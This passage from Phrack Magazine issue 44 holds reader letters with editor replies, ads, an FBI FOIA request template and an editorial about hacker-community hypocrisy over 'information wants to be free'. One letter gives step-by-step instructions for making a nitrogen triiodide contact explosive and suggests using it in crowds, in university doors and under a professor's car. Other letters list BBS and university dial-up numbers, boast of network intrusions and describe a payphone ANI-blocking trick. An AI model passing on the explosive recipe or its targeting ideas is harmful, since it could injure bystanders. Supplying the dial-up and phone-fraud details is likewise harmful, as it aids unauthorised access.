  773.    Also, I'm a Canadian Hacker who's just starting out, and since pretty much
  774. all the Hacking BBS's are in the U.S., I need to get into a Sprintnet PAD, and
  775. an out dial, so, is there anyway to get a copy of the SprintNet directory
  776. phrack 42 which still contains passwords? (fuck, what a leech)
  777.  
  778. {Oh yeah, I miss the explosive recipes from early issues, here's one from my
  779.  personal collection, you can publish it if you want.}
  780.  
  781.                       AMMONIA TRIIODE CRYSTALS
  782.  
  783.      Chemicals                     Equipment
  784.      ~~~~~~~~~                     ~~~~~~~~~
  785.  
  786.      1-Iodine Crystals             1-Funnel & filter paper
  787.                                      (coffee filters work pretty well)
  788.      2-Clear household Ammonia
  789.        (or pure ammonia for the
  790.        clinically insane)          2- 2 glass jars
  791.  
  792.    Ammonia Triiode is a blackish crystal which explodes under heat inpact
  793. producing a toxic gas which stains everything around it purple (some serious
  794. vandalism potential here). WARNING -- be sure to use an ammonia which is
  795. impure; crystals made with pure ammonia will explode if touched or in
  796. sunlight!
  797.  
  798. 1) Place about two teaspoons of iodine into one of the glass jars and add
  799. enough ammonia to completely cover the crystals.
  800.  
  801. 2) Put the paper into the funnel and place the funnel over the other jar.
  802.  
  803. 3) Let the iodine soak in the ammonia for a few minutes (5) and then filter
  804. the solution into the other jar.
  805.  
  806. 4) Take the purplish crystals from the filter paper and dry them on a piece of
  807. paper towel, separating them into smallish pieces. (you'll probably want to
  808. dry them in a cool, dark place which would look good painted a blackish purple,
  809. in case the crystals detonate)
  810.  
  811. 8) After the crystals dry gently place each piece onto a square of tape
  812. (opaque duct tape or, electrician's tape work best) and put a piece of tape
  813. over them. _GENTLY_ press the tape together _AROUND_ the crystal.
  814.  
  815.    Once made the crystals will last a week. When detonated they produce a
  816. bang and a cloud of gas but no flame. In other words, their perfect for
  817. putting on the ground in crowds, in the hinges of your University's doors,
  818. in front of the wheels of your favorite professor's car etc.
  819.  
  820.                                                       />ragline
  821.  
  822. [Ahhh, sweet destruction.  Listen, recipes like this one are very DANGEROUS.
  823.  Do not attempt to do this.  Phrack will take no responsibility for any
  824.  damages or injuries resulting from anyone constructing the above.
  825.  
  826.  About the SprintNet scan...Phrack doesn't publish passwords.  If you
  827.  were any kind of hacker at all, you would enjoy trying to get them yourself.
  828.  Does your mommie still tuck you in to bed too?
  829.  
  830.  About subscribing through CompuServe, I don't know what you may have read
  831.  in the past, but Phrack has many CompuServe subscribers.  Try requesting
  832.  a subscription.  Everything should work out fine.]
  833.  
  834. -------------------------------------------------------------------------------
  835.  
  836. Hey.  I'm an editor of a magazine being put together in Toronto, and I'd
  837. like to ask to use your disclaimer.  I'll not bore you with the blabberings
  838. of how 'el33+e' this mag will be, as I'm sure you just *love* those type of
  839. messages.  (Note:  The mag's called, 'Ban This', if you see it around, I'd
  840. appreciate any feedback you can give.)
  841.  
  842. Anyhow, thanks for listening.
  843.  
  844. [Feel free to use the disclaimer.  It would be best if you mentioned Phrack
  845.  somewhere in there as well.]
  846.  
  847. -------------------------------------------------------------------------------
  848.  
  849. xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx
  850.  
  851.                            IT'S BACK!!!!W$#@$#@$
  852.  
  853.                                _-_-_-_-_-_-_
  854.                                (           )
  855.                                 (  B00m   )
  856.                                  (      )
  857.                  CAU               \  /                 CAU
  858.                                   __||___
  859.            "We WiLL BloW     /---/|_____|\----\    uP YoUr CaR!"
  860.                              /CaU-__WuZ__-HeRe\-
  861.                                 (0)       (0)
  862.  
  863.                                fARM R0Ad 666
  864.       _   _                       PaRt II               _   _
  865.      ((___))                   (713)855-0261           ((___))
  866.      [ x x ]                                           [ x x ]
  867.       \   /    cDc            SySoP: EighT BaLL         \   /    cDc
  868.       (' ')                     COs: M.C. AllaH         (' ')
  869.        (U)   K-C0W F0RCe             ChilliN             (U)   K-C0W F0RCe
  870.                                      Nitzer EbB
  871.  
  872.      ' CAU HomesitE                     ' CAU Member SitE
  873.      ' cDc Factory Direct OutleT(KCF)   ' 0b/GyN Member SitE
  874.      ' Pure Hack/Phreak OrienteD        ' Serious Hack/Phreak DiscussionS
  875.      ' Flashback SoftwarE               ' No RatioS
  876.      ' 24oo-14.4 bpS                    ' Exophasia Submission SitE(ThP)
  877.  
  878. xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx
  879.  
  880. [Call now and watch 8-Ball shoot up!]
  881.  
  882. -------------------------------------------------------------------------------
  883.  
  884. Digital Highways magazine is an Alternative & Metal Magazine.
  885. We Have Reviews of many Local bands from all over USA and National bands.
  886. We have Press Releases, Concert Information, National Tours, Local tours,
  887. and small tours (small bands) to the large world-wide known bands.
  888. Top 10 Music Lists, Information on how to get Free to Really Cheap info.
  889. from the music industry. PLUS poetry (alternative) and other info from
  890. what's coming out in the stores or who's recording and what not.
  891.  
  892. all of this for $2 for US and Canada (US Funds only) And for Foreign People
  893. its 4 dollars Us funds.
  894.  
  895. As my best deal goes.. if you send in a demo tape for review (it must be
  896. your band's),  or if you send in poetry and we publish it you get one free
  897. issue.  Demo tape senders get a free issue no matter what, and you always
  898. get a review. we have FREE classifieds.  All subscribers can get free listing.
  899. (we may edit or drop any ad, and we may not publish all ads.)
  900.  
  901. This is the first issue, so send away! to this address rem US/CAN 2$ other 4$
  902.  
  903. Digital Highways
  904. Po Box 38
  905. Troutville,Va 24175
  906.  
  907. -------------------------------------------------------------------------------
  908.  
  909. Hi Erik Bloodaxe,
  910.  
  911. I am a student of Computer Science at University of Salerno (South-Italy),
  912. near Naples.
  913.  
  914. I have so many copies of Phrack Magazine and I think that You are the Best
  915. in the Computer Underground Community.
  916.  
  917. So I leech Your Magazine from many BBS (the ones with the h0ttest H/P/CC
  918. Area) like this:
  919.  
  920. +49-58618795            NightBox
  921. +46-18262804            EaglesNest
  922. +1-5152553212           Down of Immortality (ex Pirate's Ship TRSi/WHQ)
  923.                         ( here there the my friend SysOp Mike Bockert
  924.                           best known a.k.a THE SKELETON / TRSi-TDT )
  925. +1-2018184894           TUGO The UnderGround OASIS --->  ZZC USHQ
  926. +598-2-497108           Abn0rmal States
  927. +598-2-421996           ( here there is another SysOp friend of mine
  928. +598-2-421994             named Alex a.k.a L0neW0lf )
  929. +1-2019394543           Fastrax
  930. +1-2019397597             |||
  931. +1-2019398448             |||
  932. +1-2014607022             |||
  933. +1-2014609523             |||
  934. +1-7183975413           The Pit
  935. +1-7183975532             |||
  936. +1-7183975520             |||
  937. +1-7183975442             |||
  938. +1-7185074605             |||
  939. +1-3133832116           Pirates Heaven ( The best SysOp I've seen: Nitro)
  940. +1-7166554940           The Edge
  941. +39-744302593           Temple Of Gurus ( Tecn[0]brains WHQ ) SysOp: POWS/TCB
  942. +39-744305366                              |    |    |
  943. +39-744305547                              |    |    |
  944. +39-238003442           Asylum BBS
  945. +39-24500837            Pier BBS Node 0
  946. +39-24582105               |||   Node 1
  947.  
  948. Excuse me for the awful list (I am on many others BBS too !!!!) and
  949. note the my handle is usually _/ane but my real Identity/Handle is
  950. PLiNi0 iL VeCCHi0 and the Location I used to write is GReeNiSLaND (because
  951. the second-name that usually identify the Island of Ischia where I live
  952. with my parents: Ischia is a island located in middle Naples's Bay near
  953. the Island of Capri)... so I like to be called as
  954. PLiNi0 iL VeCCHi0 / uNiTeD PHReHaCKeRS oF GReeNiSLaND  or best -u-.-P-.-G-
  955.  
  956. My best works come in Unix Environment on BSD 4.x , Ultrix , SunOs and
  957. Multimax of Encore Corporation: I hacked the Italtel Network, the National
  958. Council of Research best known in Italy as C.N.R. or CNR, and many host
  959. at University of Naples, Rome, Salerno and Venice... Starting by Italtel
  960. Telematica in Milan I was at point of hack the HQ of AT&T in Bruxelles
  961. because many users of Italtel Telematica in Milan worked in AT&T too...
  962. but to get some examination at University (Like Fisics II and Cibernetica)
  963. I must abandon this k()()l work (but I'm interested to restart at AT&T).
  964.  
  965. So in the -= Phrack 42 =- I read this as follow:
  966.  
  967. /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
  968. ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
  969. \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
  970.  
  971. In the same number of Phrack Magazine I read about TheNewHacker in North Italy
  972. (in Torino) that was interested to get in contact with hackers. Ok, maybe I
  973. was a little hacker, but I stay in South Italy ( I am located in Island of
  974. Ischia, near Napoli, U know !!!)... Anyway if U can give my E-mail address to
  975. TheNewHacker and give me the E-mail of TheNewHacker I will be so glad too...
  976. I was interested in contributing to write for a compilation file on the hacking
  977. scenes in Italy and France too (I have a friend that works at MATRA-ESPACE
  978. for ESA best known as European Spazial Agency located in Toulouse). So lemme
  979. known if I can help Your Magazine with my contributions and/or my work.
  980.  
  981. A last thing ....
  982.         can You, Dear Erik Bloodaxe, give me some Internet address of BBS or
  983.         FTP Sites with Underground Stuff or any kind of other K()()l stuff ?!
  984.         (P.S. Can I get Phrack Magazine via FTP at any sites ?!??!)
  985.  
  986. [Hey man, Thanks a lot for the BBS list.  I don't really call BBSes much, but
  987.  I'm sure our readers will get a lot of use out of them!
  988.  
  989.  About writing files, GO FOR IT!  We always need files.  Feel free to send us
  990.  anything you have written and want to publish!
  991.  
  992.  I will forward your info on to TheNewHacker in Italy.  Maybe you two can
  993.  take Italy by storm.  Haha!
  994.  
  995.  Phrack's FTP site is ftp.netsys.com.  All issues can be found there.
  996.  also zero.cypher.com has a lot of files for ftp.]
  997.  
  998. -------------------------------------------------------------------------------
  999.  
  1000. Hi.  I've been spending all my free time reading through phreaker files and
  1001. all of the old Phracks.  And, I was wondering if you are still there???
  1002.  
  1003. If so, I need your help!  Here's the story:
  1004.  
  1005. On August 3, 1993 I was indicted on charges that my company attempted to rip
  1006. AT&T off of nearly $2MM in 1991.  They say we started a 900# and went around
  1007. the country calling it from Pay Telephones.
  1008.  
  1009. They say that we went to a truck stop in Oregon and called the number 43,000+
  1010. times racking up an $800,000+ phone bill.
  1011.  
  1012. They claim that computers were probably used, although I have seen no
  1013. evidence of that.
  1014.  
  1015. These pay telephones are those AT&T Black Phones; you know, the ones in the
  1016. airports.   They are owned by AT&T, built by AT&T, designed by AT&T, and even
  1017. billed to AT&T.
  1018.  
  1019. The evidence consists of nothing more than ANI reports.  Some phone bills to
  1020. back them up, but for the majority of it, they are using only ANI.  Now, we
  1021. all know that any can be blocked by having the operator get you a call.  And
  1022. it can be changed by dialing 0, having her get you 1-800-321-0288, then
  1023. having the toll free call be made.  In some areas, 900 calls
  1024. slipped through that way, but it would be pretty hard to do 43,000 times.
  1025.  
  1026. My point is, there are probably flaws with ANI.  Someone who knows what they
  1027. are doing may possibly be able to block or change ANI.  Or maybe these calls
  1028. were never put through.  Maybe someone got into the CO, etc...
  1029.  
  1030. What I need is someone who has knowledge of possible flaws with AT&T's
  1031. theory.  Enough that could give reasonable doubt and appear as an expert
  1032. witness or point out where we could find someone.
  1033.  
  1034. If you know of someone who might be able to help, please respond.  My
  1035. INTERNET ID is NOFRIENDS@AOL.COM or I have set up a FAX @ 1-800-572-4403.
  1036.  
  1037. Remaining,
  1038.   NOFRIENDS
  1039.  
  1040.  
  1041. [43000?  Like a 43 and 3 zeros?  Jesus.  That's a lot of calls.  I really
  1042.  don't understand how they can be charging you with something hey say
  1043.  was done from a payphone.  Do they have pictures of you at the phone
  1044.  making the calls?  Sounds like a load of crap and any lawyer should be
  1045.  able to get the charges dropped based on such flimsy evidence.
  1046.  
  1047.  As far as there being a problem with ANI, I don't think that's an issue.
  1048.  I've never heard of anything like this happening in the past, but there
  1049.  always could be a first time.  Something is obviously amiss, but my gut
  1050.  reaction is that the Phone Company is lying about there being such records.
  1051.  
  1052.  Get a lawyer and demand the records be turned over during discovery.  Then
  1053.  maybe you can see what you are up against.  GET A LAWYER!@#]
  1054.  
  1055. -------------------------------------------------------------------------------
  1056.  
  1057. Hi, I'd like to subscribe to Phrack and all upcoming issues (44+). Thanks.
  1058. BTW, when is 44 scheduled for?
  1059.  
  1060. Ciao,
  1061. spirit-hex@prometheus.mtlnet.org
  1062.  
  1063. PS: My board carries all PHRACK issues. I have around 4000 *quality* text
  1064. files on my system. It's called operation prometheus at 514-735-4340. do you
  1065. think you could post a small ad. for it in your magazine? We have FTP
  1066. access/150 Usenet news/Internet accounts for members, ect.. (2 nodes at 14,400
  1067. baud). Thanks!
  1068.  
  1069. [There you go!]
  1070.  
  1071. -------------------------------------------------------------------------------
  1072.  
  1073. Hey, if you are having problems with people breaking the registration
  1074. agreement as outlined in your last couple issues of Phrack. i may be able
  1075. to help, and then I may not. My neighbor is a good friend, and fraud
  1076. investigator. She is aware of my hobbies one of which involves Phrack. She
  1077. thinks it is really neat what I am able to do with computers / modem. I am
  1078. speaking somewhat candidly here but I am sure that you are smart enough to
  1079. get my point. Well she handles some stuff like the David Koresh thing
  1080. and helping the ATF/FBI with other cases. She likes the stuff that is too
  1081. complicated for the FBI, all in all she does the investigating and puts it
  1082. into words that the FBI, ATF, USDJ, SS, Dept of Treasury/IRS can
  1083. understand, so they can make an arrest. All in all what i am trying to say
  1084. is I may be able to pass the word on down the line to her about these
  1085. people breaking the copyright law now effective on Phrack magazine. If you
  1086. would like my help on this subject, just for the simple fact she loves to
  1087. do this stuff, and phrack is a regularly read magazine by myself. If you
  1088. would like maybe something can be done to these hypocrites that value laws,
  1089. and get people arrested for the same stuff that they are currently doing
  1090. by not registering Phrack. Just let me know if you want to try to push it.
  1091. I will get together w/ her and see what can be done. Hopefully she will
  1092. just ask for names and get an investigation started. Never can tell tho.
  1093.  
  1094. L8r Sparky
  1095.  
  1096. [I hope to God that I never have to go through the legal nightmare of
  1097.  trying to prove financial damages incurred by companies "pirating" phrack.
  1098.  
  1099.  It would be somewhat interesting to use some big company as an example, and
  1100.  embarrass everyone into submission, but I keep hoping that people will just
  1101.  be HONEST.  Fuck, I may be a hacker, but I'm honest about it.
  1102.  
  1103.  "Chris, have you broken into other people's computers?"
  1104.  "Yes, yes I have."
  1105.  
  1106.  "Company, do your people read Phrack without registering your subscriptions?"
  1107.  "Uh, well, no, we used to read Phrack, uh, but we don't anymore."
  1108.  
  1109.  You all suck.  You know who you are.  How can you live with yourselves?]
  1110.  
  1111. -------------------------------------------------------------------------------
  1112.  
  1113. If you don't already have the direct-dialup number for
  1114. the student annex of the University of Adelaide for Phrack 44, here it is:
  1115.  
  1116. +61-8-223-2657
  1117.  
  1118. there are eight 2400 baud modems, but at the moment one is dead.
  1119.  
  1120. [Cool.  International University Dialups!
  1121.  
  1122.  Our big US list is still being compiled, so everyone keep sending in
  1123.  your school's dialups.  Its taking me forever to do this alone.]
  1124.  
  1125. -------------------------------------------------------------------------------
  1126.  
  1127. Hi Chris....
  1128.  
  1129. Was thinking...seeing as you guys are in texas, how about an article on
  1130. EDSNET ??
  1131.  
  1132. (There are dialups down here to it, via INFONET)
  1133.  
  1134. [If EDSNET is what I think it is, didn't it used to be called Pac*It Plus?
  1135.  
  1136.  I had a scan of it a LOOOONG time ago when everyone used it to call
  1137.  altger and tchh.  If anyone has a scan of it, or wants to do one, please
  1138.  send it to Phrack!]
  1139.  
  1140. -------------------------------------------------------------------------------
  1141.  
  1142. So, what IS new in cyberspace? lyl libido
  1143.  
  1144. [BILLY IDOL SPEAKS!  OHMIGOD...HE TALKED TO ME!  OH MY!  I THINK I'M GONNA
  1145.  MESS UP MY PANTS!  BILLY IDOL!  OH GOD OH GOD OH GOD!  O H  M Y  G O D ! !
  1146.  
  1147.  Whew.  Someone get the mop.
  1148.  
  1149.  What's new?  Well, all kinds of people have jumped on the Express Lane
  1150.  of the Information Highway and have tried to make a new name for themselves
  1151.  by exploiting a concept they know nothing about purely as a marketing move.
  1152.  Gotta love it.
  1153.  
  1154.  Bob, I'll take Billy Idol in the Center Square to block...]
  1155.  
  1156. -------------------------------------------------------------------------------
  1157.  
  1158. Thought you guys at Phrack might be interested in this small phile, if you
  1159. don't already have it.  It's simply a form letter to the FBI requesting
  1160. all information they on file about you under the Freedom of Information
  1161. Act and Privacy Act.  They MUST respond, by law, or they face legal
  1162. penalties.  Traditionally what they do is ignore your request unless they
  1163. think you have enough money to go to court (i.e, you work for the New York
  1164. Times or something).
  1165.  
  1166. Really enjoyed Phrack #43 (as usual) - keep up the good work!  (file follows
  1167. signature)
  1168.  
  1169. -------------------------------------------------------------------------
  1170. Doug
  1171. -----------------------------------------------------------------------
  1172. PRIVACY ACT & FREEDOM OF INFORMATION ACT REQUEST
  1173.  
  1174. Name
  1175. Street Address
  1176. City, State, Zip                                          Date
  1177.  
  1178. Federal Bureau of Investigation
  1179. Records Management Division - FOIA/PA Office
  1180. 9th & Pennsylvania Avenue NW
  1181. Washington, DC 20535
  1182.  
  1183. Gentlemen:
  1184.  
  1185. This is a request under the provisions of both the Privacy Act
  1186. (5 USC 552b) and the Freedom of Information Act (5 USC 522).
  1187. This request is being made under both Acts.
  1188.  
  1189. I hereby request one copy of any and all records about me or
  1190. referencing me maintained by the FBI.  This includes (but should
  1191. not be limited to) documents, reports, memoranda, letters,
  1192. electronic files, database references, "do not file" files,
  1193. photographs, audio tapes, videotapes, electronic or photographic
  1194. surveillance, "june mail", mail covers, and other miscellaneous
  1195. files, and index citations relating to me or referencing me in
  1196. other files.
  1197.  
  1198. My full name is:  __________________________
  1199. My date of birth was:_______________________
  1200. My place of birth was:______________________
  1201. My social security number is:________________
  1202. I have lived in these places:__________________________________
  1203. _______________________________________________________________
  1204.  
  1205. Other names, places, events, organizations, or other references
  1206. under which you may find applicable
  1207. records:_________________________________________________________
  1208. _________________________________________________________________
  1209.  
  1210. As you know, FOIA/PA regulations provide that even if some
  1211. requested material is properly exempt from mandatory disclosure,
  1212. all segregable portions must be released.  If the requested
  1213. material is released with deletions, I ask that each deletion be
  1214. marked to indicate the exemption(s) being claimed to authorize
  1215. each particular withholding.  In addition, I ask that your
  1216. agency exercise its discretion to release any records which may
  1217. be technically exempt, but where withholding serves no important
  1218. public interest.
  1219.  
  1220. I hereby agree to pay reasonable costs associated with this
  1221. request up to a maximum of $25 without my additional approval.
  1222. However, I strongly request a fee waiver because this is, in
  1223. part, a Privacy Act request.
  1224.  
  1225. This letter and my signature have been certified by a notary
  1226. public as marked below.
  1227.  
  1228. Sincerely,
  1229.  
  1230.  
  1231. _______________________________
  1232.  
  1233. requester's signature
  1234.  
  1235. ______________________________            ___________________________
  1236.  
  1237. requester's printed name                  notary stamp and signature
  1238.  
  1239.  
  1240. [Anyone who thinks they might be suspected of something might want to
  1241.  fill this out.  Its not a bad idea.  If YOU DON'T think you are under
  1242.  some kind of investigation, you probably shouldn't.  No reason to give
  1243.  them any leads.]
  1244.  
  1245.  -------------------------------------------------------------------------------
  1246.  
  1247.          "We at Phrack welcome constructive criticism, but at least
  1248.           have the nerve to email directly, rather than hide behind
  1249.           an anonymous remailer.  That way, someone could have
  1250.           responded to you in a more direct and expeditious manner."
  1251.  
  1252. While I agree with your general analysis of the intelligence of that
  1253. reader, I have to take exception to your disparaging of the anonymous service.
  1254. The anonymous service takes flak from many people constantly, but usually it
  1255. is from reactionary establishment types, and it's not what I expect
  1256. from phrack.
  1257.  
  1258. Anonymous communications have many purposes other than the sender lacking
  1259. "nerve".  The "the only reason to use anon mail is because you are a coward
  1260. and can't stand up for what you say" argument sounds remarkably similar to
  1261. the "the only reason to use cryptography is because you are a criminal and
  1262. have something to hide" argument.
  1263.  
  1264. No doubt many criminals use cryptography and no doubt many spineless cowards
  1265. use anon mail, but to disparage someone for using anon mail is similar to
  1266. disparaging someone for using cryptography: even if it is in this case
  1267. accurate, it spreads the misconception that there are only "dishonest"
  1268. reasons to use these things. As someone with great respect for privacy
  1269. that allows me to see the legitimate (and necessary to a free and
  1270. democratic society) use of both secure and private communications, and
  1271. anonymous communications, I know that this is not the case.  I will not list
  1272. legitimate uses of anonymous mail for you, because they are much the arguments
  1273. for cryptography, and no doubt you know all of these.  But a possibility is
  1274. that the person involved would have his job/professional connections
  1275. threatened if some people knew that he read Phrack and sympathized with it.
  1276. Just a possibility, but if it is not true in this case it is surely easy
  1277. to believe it is true in others.
  1278.  
  1279. Sure, for those of us who can easily get a million email accounts from
  1280. various places in any pseudonym we want, anonymous mail is unnecessary.
  1281. But a legitimate and secure (and respected) way to send the occasional
  1282. anonymous message is much preferable to (possibly illegal) deception and fraud.
  1283.  
  1284. So, in short, even though the reader in question may indeed have been a
  1285. spineless coward (not to mention whining nitwit), to insult him for his
  1286. use of the anonymous server is harmful to the cause of anonymous mail,
  1287. a cause which has few supporters and many disparagers, and a cause which
  1288. the operators of the anonymous server in Finland should be commended for.
  1289. Secure anonymous mail (which really doesn't quite exist yet, actually),
  1290. like secure encryption, is something necessary and good for a free
  1291. society and, and should not be disparaged.
  1292.  
  1293. [Yes, you are 100% right.  I really didn't mean to dis the anonymous
  1294.  mail service as a whole, I just wanted to rag on the butthead who
  1295.  sent me an anonymous piece of hate-mail.
  1296.  
  1297.  I personally don't use, nor have a need to use, the anonymous mailers,
  1298.  but I know a lot of people do.  They DO provide a much needed service to
  1299.  a lot of people, and you are right they should be commended on a job well
  1300.  done.
  1301.  
  1302.  However, if someone wants to send me some kind of shitty piece of mail,
  1303.  get a pair of balls and show yourself.  If you are so unsure of your comments
  1304.  that you need to hide, then your point must not be very valid.]
  1305.  
  1306. -------------------------------------------------------------------------------
  1307.  
  1308. "Jurassic Punk" T-shirts are now available from your phriends at CYBERPUNK
  1309. SYSTEM.  These 100% cotton shirts are black, with artwork on the front
  1310. with the words "A subculture 5,120 years in the making."
  1311.  
  1312. Underneath the letter are bitstreams "11010001011101".  On the back, in white
  1313. is "Attitude is everything."  Allegedly similar in design to the Jurassic
  1314. Park logo.
  1315.  
  1316.      Shirt               $15 ea
  1317.      Cap                 $15 ea
  1318.      Color Decals        $1 ea
  1319.  
  1320. Please include $3 per item for shipping and handling, $5 if overseas.  Allow
  1321. 3-4 weeks for delivery.
  1322.  
  1323.      CYBERPUNK SYSTEM
  1324.      P.O. Box 771072
  1325.      Wichita, KS  67277-1072
  1326.  
  1327. Legacy@cpu.cyberpnk1.sai.com
  1328.  
  1329. ****** STILL AVAILABLE ******
  1330.  
  1331.      On May 24 1992, two lone Pirates, Legacy of CyberPunk System, and Captain
  1332. Picard of Holodeck, had finally had enough of AT&T.  Together, they traveled
  1333. to the AT&T Maintenance Facility, just west of Goddard, Kansas, and claimed
  1334. the property in the name of Pirates and Hackers everywhere.  They hoisted the
  1335. Jolly Roger skull and crossbones high on the AT&T flagpole, where it stayed
  1336. for 2 days until it was taken down by security.
  1337.  
  1338. This event was photographed and videotaped by dGATOBAS Productions, to
  1339. preserve this landmark in history.  And now you can witness the event.
  1340. For a limited time we are offering a 11" x 17" full color poster of the
  1341. Jolly Roger Pirate flag flying high over AT&T, with the AT&T logo in plain
  1342. view, with the caption; "WE CAME, WE SAW, WE CONQUERED."
  1343.  
  1344. Also available, by request is a 20" x 30" full color poster, and a cotton
  1345. T-shirt with the same full color picture on the front.
  1346.  
  1347. Prices:
  1348.  
  1349. 11" x 17" Full Color poster...........................$10 US
  1350. 20" x 30" Full Color photograph.......................$20 US
  1351. T-Shirt with picture on front.........................$20 US
  1352.  
  1353. If you are interested in purchasing any of the above items, simply send check
  1354. or money order for the amount, plus $3 US per item for postage and handling
  1355. to:
  1356.  
  1357.      CYBERPUNK SYSTEM
  1358.      P.O. Box 771072
  1359.      Wichita, KS  67277-1072
  1360.  
  1361. Be sure to specify size on T-shirt.
  1362.  
  1363. A GIF of this is also available from CyberPunk System, 1:291/19 (FidoNet),
  1364. 47:617/0 (VUARNet), 93:3316/0 (PlatinumNet),  69:2316/0 (CCi).  FREQ magicname
  1365. PIRATE.  Also available uuencoded, send mail to Legacy@cpu.cyberpnk1.sai.com
  1366.  
  1367. [God bless the free enterprise system!
  1368.  God bless capitalism!
  1369.  God bless America!]
  1370.  
  1371. -------------------------------------------------------------------------------
  1372.  
  1373. I am unhappy to say that UPi now has dropped writing the magazine from
  1374. this point on.  The reason is because Arch Bishop and myself do not have the
  1375. time to get everyone to write their articles, sort the magazine out, etc, etc.
  1376. This does not mean the group is dead, that is not true.  The group is still
  1377. alive, but all future releases will be sent to Phrack for publication but under
  1378. the UPI name.
  1379.  
  1380. If you want to get a list of all the current sites and members of UPI you
  1381. can finger my internet account to get the list.  If you want any of the phone
  1382. number(s) for the sites, or you have any questions or anything else to say
  1383. you can drop us a line.  Anyways I guess that's it for now.  ttyl
  1384.  
  1385. The Lost Avenger/UPI
  1386. Internet: mstone@nyx.cs.du.edu
  1387. Voice Mailbox: 416-505-8636
  1388.  
  1389. [Phrack appreciates this offer to donate your files to us!  We're sorry to
  1390.  hear that your mag won't be continuing, but I know what a pain in the
  1391.  ass it is to put out a magazine.  It SUCKS!  It's a time consuming
  1392.  thankless task.  But what the hell, I'm stupid, and I have NO LIFE!  Hehe.]
  1393.  
  1394. ***************************************************************************
  1395.  
  1396.                               ==Phrack Magazine==
  1397.  
  1398.                  Volume Four, Issue Forty-Four, File 2a of 27
  1399.  
  1400.                                    Editorial
  1401.  
  1402. ****************************************************************************
  1403.  
  1404.  
  1405. This is going to piss people off, but hell, that's the point of having
  1406. an editorial, eh?
  1407.  
  1408. This issue I'd like to address something running rampant in our
  1409. community:  HYPOCRACY.  I never really paid much attention to it, until
  1410. the "Hacking At The End Of The Universe" conference in Amsterdam.
  1411.  
  1412. The phrase "Information Wants to be Free," almost cliche by now, was
  1413. heard screaming from nearly every speaker's mouth.  It underlie in the
  1414. tone of the whole proceedings.  Everyone was either bitching about how
  1415. this should be free, or that should be available, or it shouldn't be
  1416. illegal to do some particular act, or they were fervently offering their
  1417. support of these ideals.
  1418.  
  1419. Granted, Holland has a notoriously permissive and open society; and
  1420. indeed, Europe in general is far more laid back than the States, but
  1421. even many in the US hold these ideals close to heart.
  1422.  
  1423. One of the first things that pissed me off was the hundred guilder
  1424. entrance fee.  That's fifty dollars!  Just to get in.  On top of
  1425. that one had to pay for a tent, sleeping bag, mattress and food.  I have
  1426. no problems with paying a fee, but this was Hack-Tic charging.  One of
  1427. the biggest proponents of "Information Wants to be Free!"
  1428.  
  1429. Obviously YOUR information wants to be free, but theirs costs a hundred
  1430. guilders.
  1431.  
  1432. Even more shocking was the fact that nearly every session involving some
  1433. kind of "technology" was geared around a Hack-Tic product:  the
  1434. Demon Dialer (tm), their POCSAG demodulator, their forthcoming
  1435. spread spectrum lan adapter, or the magazine itself.  Were these free?
  1436. Were the information behind their design provided so would-be
  1437. technoweenies could run right home and break out the soldering iron?
  1438. Fuck no.  Again, Hack-Tic's information is valuable, and YOU must PAY
  1439. for the luxury of viewing it.  Unlike XYZ Corporation's information,
  1440. whose R & D or Financials (which might bring someone a hefty "finder's
  1441. fee") so desperately wants to be free of its magnetic bonds and spread
  1442. all the way to YOUR hard drive.
  1443.  
  1444. I don't want to rag on Hack-Tic too much.  I mean, throwing a conference
  1445. costs a shitload of money, and I have a GREAT deal of respect for them
  1446. for actually pulling off something so monumental.  I just want to put
  1447. things in perspective.  The major cons in America (HoHo, Scon) really don't
  1448. charge.  They "ask" for donations.  Sure, you might get a nasty look if
  1449. you don't cough up five or ten bucks, but hell, everyone does.  They
  1450. WANT to.  A good time is worth a handfull of change.  And there isn't
  1451. some awesome requirement just to get in the damn door.  Besides, losses
  1452. can always be made up by selling a plethora of crap such as t-shirts and
  1453. videos, which everyone always wants to buy.  (Hardware costs.  :) )
  1454.  
  1455. Shifting back to America:  2600.  Again, "Information Wants to be Free!"
  1456. E. Goldstein, huge proponent of the slogan.  Uh, do you pay five bucks
  1457. an issue?  I do.  So, 2600's information isn't quite so eager to be free
  1458. either, I guess.  But, again, it does cost money to print a magazine
  1459. like that, like it does to throw a conference, so certainly everyone can
  1460. understand people trying to recap one's losses in a worthwhile project,
  1461. right?
  1462.  
  1463. Enter LOD Communications BBS Archive Project.  The community went
  1464. apeshit when thirty nine dollars was asked for the entire results
  1465. of the project.  LOD?  Asking for MONEY?  FOR INFORMATION???
  1466. INFORMATION WANTS TO BE FREE!!!#!@$  That's disgusting!
  1467.  
  1468. But wait, I thought charging a little bit to try to recap losses
  1469. (equipment, phone calls, disks, postage, TIME) was ok?  "Oh sure it is
  1470. dude, just not for you."  Oh how silly of me.  Of course!  Thanks for
  1471. setting me straight on that issue.
  1472.  
  1473. Then there was Phrack.  Always free to the community.  Always available
  1474. for everyone's enjoyment.  Asking only that Corporate types pay a
  1475. registration fee of a hundred dollars just to keep them honest.  (They
  1476. aren't.)  Knowing full well that they are stealing it, sometimes quite
  1477. brazenly.  Resting quietly, knowing that they are just as unethical as
  1478. they ever claimed us to be.
  1479.  
  1480. We make no bones about money here.  Our information is just as valuable
  1481. as anyone's (probably more so) and is vastly more voluminous.  Hell,
  1482. Issue 43 was probably bigger than every Hack-Tic and almost every
  1483. 2600 combined.  And, wait a minute, could it be?  Free?  Oh my god!  So
  1484. it is.  Free in both cost and access.
  1485.  
  1486. Let me tell you something.  Information does not want to be free, my
  1487. friends.  Free neither from its restraints nor in terms of dollar value.
  1488. Information is a commodity like anything else.  More valuable than the
  1489. rarest element, it BEGS to be hoarded and priced.  Anyone who gives
  1490. something away for nothing is a moron.  (I am indeed stupid.)  I can't
  1491. fault anyone for charging as long as they don't try to rationalize their
  1492. reasoning behind a facade of excuses, all the while shouting "Information
  1493. Wants to be Free!"
  1494.  
